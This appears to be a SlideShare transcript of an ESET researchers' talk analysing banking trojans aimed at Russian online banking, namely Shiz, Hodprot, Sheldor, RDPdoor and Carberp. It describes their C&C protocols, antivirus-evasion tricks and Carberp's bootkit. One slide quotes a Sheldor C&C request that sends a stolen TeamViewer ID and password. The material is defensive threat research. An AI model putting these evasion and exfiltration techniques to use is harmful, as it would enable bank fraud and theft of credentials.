Modern malware techniques for attackingRBS systems in RussiaAleksandr MatrosovEugene Rodionov
Who we are? Malware researchers at ESET     - complex threats analysis     - development of cleaning tools     - tracking ...
Agendao Cybercrime trends in RBSo Most prevalent threats and incidents   Win32/Shiz   Win32/Hodprot   Win32/Sheldor   ...
Overview2010/11: years of attacks on Russian banks• number of incidents has more than doubled compared to 2010*Over 92%* o...
Interesting facts about Russian bank fraud         These guys are still free!
Evolution of RBS trojanso RBS Trojans 2009-2010:   o RBS Trojans 2011:     Win32/Shiz (2009)         Multiple updates   ...
Cybercrime landscape (2010)
Cybercrime landscape (2011)
Cybercrime landscape (2011)
Win32/Spy.Shiz
Win32/Spy.Shiz detection statistics by monthCloud data from Live Grid                    August 2009 – November 2011
Win32/Spy.Shiz detection statistics by countryCloud data from Live Grid
Win32/Spy.Shiz: stealing money
Win32/Hodprot
Win32/Hodprot detection statistics by monthCloud data from Live Grid                    July 2010 – November 2011
Win32/Hodprot detection statistics by countryCloud data from Live Grid
Win32/Hodprot: antiforensics      Main module                Original sfcfiles.dll                                        ...
Win32/Hodprot: injecting payload  Winlogon Address                                           Browser Address       Space  ...
Win32/Hodprot: C&C protocol          Win32/Hodprot                       C&C Server                            Send reques...
Win32/Sheldor & Win32/RDPdoor
Win32/Sheldor and TeamViewer in action1.   Request cloud ID2.   Set cloud ID3.   Send ID to C&C                        Tea...
Under the hood: DLL hooking                         TeamViewer.exe       TV.dll    (proxy DLL)                            ...
Malicious DLL call graph
Malicious DLL decompilation                              Functions for calling                              from original ...
Sheldor C&C panel
Win32/RDPdoor installation infected                                                       Win32/RDPdoorcomputer           ...
Stealing authentication data1. Install GINA extension DLL2. Display fake logon screen3. Capture user name &   password4. S...
Win32/Carberp
Win32/Carberp detections over time in RussiaCloud data from Live Grid                   January 2010 – November 2011
Win32/Carberp detection statistics by countryCloud data from Live Grid
Self-protecting                              FunctionalityBypassing AV-emulators             many calls of rare WinAPI fun...
Carberp going deeper since September 2011
Carberp going deeper since September 2011                             real mode             Load MBR                      ...
Carberp: Infected Partition Layouto Carberp overwrites bootstrap code of the active partitiono The malicious driver is wri...
Interesting strings and investigation
Win32/Carberp: money stealing methodsStealing techniques                        FunctionalityWeb-injects/Autoloads        ...
Win32/Carberp botnet control panel
C&C with stolen data
Cab-files with stolen data
Stolen data: BS-Client IB system
Stolen data: CyberPlat payment system
Stolen data: iBank IB system
Stolen data: SberBank IB
Stolen data: UkrSibBank IB
References “Cybercrime in Russia: Trends and issues”http://go.eset.com/us/resources/white-papers/CARO_2011.pdf “Evolutio...
Questions
Thank you for your attention ;) Aleksandr Matrosov matrosov@eset.sk @matrosov Eugene Rodionov rodionov@eset.sk @vxradius
Modern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in Russia
Modern malware techniques for attacking RBS systems in Russia
Upcoming SlideShare
Loading in...5
×

Modern malware techniques for attacking RBS systems in Russia

13,752

Published on

Published in: Technology
1 Comment
2 Likes
Statistics
Notes
No Downloads
Views
Total Views
13,752
On Slideshare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
0
Comments
1
Likes
2
Embeds 0
No embeds

No notes for slide

Modern malware techniques for attacking RBS systems in Russia

  1. 1. Modern malware techniques for attackingRBS systems in RussiaAleksandr MatrosovEugene Rodionov
  2. 2. Who we are? Malware researchers at ESET - complex threats analysis - development of cleaning tools - tracking new malware techniques - investigation of cybercrime groups http://www.joineset.com/
  3. 3. Agendao Cybercrime trends in RBSo Most prevalent threats and incidents  Win32/Shiz  Win32/Hodprot  Win32/Sheldor  Win32/RDPdoor  Win32/Carberpo Carberp cybercrime group revenue
  4. 4. Overview2010/11: years of attacks on Russian banks• number of incidents has more than doubled compared to 2010*Over 92%* of incidents involve banking trojansMalware tailored to Russian banks and paymentsystemsHowever!• Can (and IS) used in other countries as well *research report "The Russian cybercrime market in 2010: status and trends” http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
  5. 5. Interesting facts about Russian bank fraud These guys are still free!
  6. 6. Evolution of RBS trojanso RBS Trojans 2009-2010: o RBS Trojans 2011:  Win32/Shiz (2009)  Multiple updates  Win32/Carberp  Growing incidents numbers  Win32/Hodprot  ….  Win32/Sheldor  Win32/Carberp with Bootkit  Win32/RDPdoor
  7. 7. Cybercrime landscape (2010)
  8. 8. Cybercrime landscape (2011)
  9. 9. Cybercrime landscape (2011)
  10. 10. Win32/Spy.Shiz
  11. 11. Win32/Spy.Shiz detection statistics by monthCloud data from Live Grid August 2009 – November 2011
  12. 12. Win32/Spy.Shiz detection statistics by countryCloud data from Live Grid
  13. 13. Win32/Spy.Shiz: stealing money
  14. 14. Win32/Hodprot
  15. 15. Win32/Hodprot detection statistics by monthCloud data from Live Grid July 2010 – November 2011
  16. 16. Win32/Hodprot detection statistics by countryCloud data from Live Grid
  17. 17. Win32/Hodprot: antiforensics Main module Original sfcfiles.dll Kernel - driver image Loader code C&C URLs
  18. 18. Win32/Hodprot: injecting payload Winlogon Address Browser Address Space Space Setupapi.dll Assemble Payload Inject Payload Update Payload sfcfiles.dll Payload System Registry User-mode Kernel-mode Inject Payload Install & Load Assemble Payload Driver sfc.sys
  19. 19. Win32/Hodprot: C&C protocol Win32/Hodprot C&C Server Send request (bot ID, integer) Reply with updated Handle modules and image to Request execute Update the bot’s modules, run downloaded Send Status exeutable Information
  20. 20. Win32/Sheldor & Win32/RDPdoor
  21. 21. Win32/Sheldor and TeamViewer in action1. Request cloud ID2. Set cloud ID3. Send ID to C&C TeamViewer4. Malicious connection cloud 1 2 infected 4 computer Win32/Sheldor 3 GET C&C /getinfo.php?id=414%20034%20883&pwd =6655&stat=1
  22. 22. Under the hood: DLL hooking TeamViewer.exe TV.dll (proxy DLL) TS.dll (original TS.dll)
  23. 23. Malicious DLL call graph
  24. 24. Malicious DLL decompilation Functions for calling from original TS.dll Load original TS.dll Hook functions C&C URL
  25. 25. Sheldor C&C panel
  26. 26. Win32/RDPdoor installation infected Win32/RDPdoorcomputer C&C run dropper and send system information 1 authentication on C&C and provide Thinsoft BeTwin for installation 2 send status information 3
  27. 27. Stealing authentication data1. Install GINA extension DLL2. Display fake logon screen3. Capture user name & password4. Send to C&C
  28. 28. Win32/Carberp
  29. 29. Win32/Carberp detections over time in RussiaCloud data from Live Grid January 2010 – November 2011
  30. 30. Win32/Carberp detection statistics by countryCloud data from Live Grid
  31. 31. Self-protecting FunctionalityBypassing AV-emulators many calls of rare WinAPI functionsCode injection method ZwQueueApcThread() ZwResumeThread()Unhooking method checking first bytes of API function body and deleting hooksCommand and string encryption custom encryption algorithmBot authentication on C&C file with authentication data stored on infected PCNetwork communication encryption base64( RC2(data) )API function calls obfuscation custom hash algorithmDetection of AV hooks comparison of the first original bytesBypassing static AV signatures appending random junk bytes to dropped filesHiding in the system hooking system functions bootkit infector (September 2011)
  32. 32. Carberp going deeper since September 2011
  33. 33. Carberp going deeper since September 2011 real mode Load MBR real mode Load VBR real mode/ Load protected mode bootstrap code real mode/ protected mode Load bootmgr Target of Rovnix & Carberp real mode/ Load protected mode winload.exe or winresume.exe Load kernel and boot start drivers
  34. 34. Carberp: Infected Partition Layouto Carberp overwrites bootstrap code of the active partitiono The malicious driver is written either:  before active partition, in case there is enough space  in the end of the hard drive, otherwise MBR VBR Bootstrap Code File System Data Before Infecting Compressed After Infecting Data Malicious Malicious Bootstrap MBR VBR File System Data Unsigned Code Code Driver NTFS bootstrap code (15 sectors)
  35. 35. Interesting strings and investigation
  36. 36. Win32/Carberp: money stealing methodsStealing techniques FunctionalityWeb-injects/Autoloads inserting the specified JS-code into HTML(IE, FF, Chrome, Opera) returned by the online banking siteBackconnect backdoor loading on request special binary module(RDP/VNC) (RDPdoor, custom VNC client)Keylogger (based on WinAPI) recording keyboard events into logfileScreenSpy (based on WinAPI) saving screenshots into logfileGrabbers (Form, FTP, Pass) loading on request special binary moduleCustom plugins for RBS binary modules for specified RBS (sber.plug)
  37. 37. Win32/Carberp botnet control panel
  38. 38. C&C with stolen data
  39. 39. Cab-files with stolen data
  40. 40. Stolen data: BS-Client IB system
  41. 41. Stolen data: CyberPlat payment system
  42. 42. Stolen data: iBank IB system
  43. 43. Stolen data: SberBank IB
  44. 44. Stolen data: UkrSibBank IB
  45. 45. References “Cybercrime in Russia: Trends and issues”http://go.eset.com/us/resources/white-papers/CARO_2011.pdf “Evolution of Win32/Carberp: going deeper”http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper “Hodprot: Hot to Bot”http://go.eset.com/us/resources/white-papers/Hodprot-Report.pdf Follow ESET Threat Bloghttp://blog.eset.com
  46. 46. Questions
  47. 47. Thank you for your attention ;) Aleksandr Matrosov matrosov@eset.sk @matrosov Eugene Rodionov rodionov@eset.sk @vxradius

×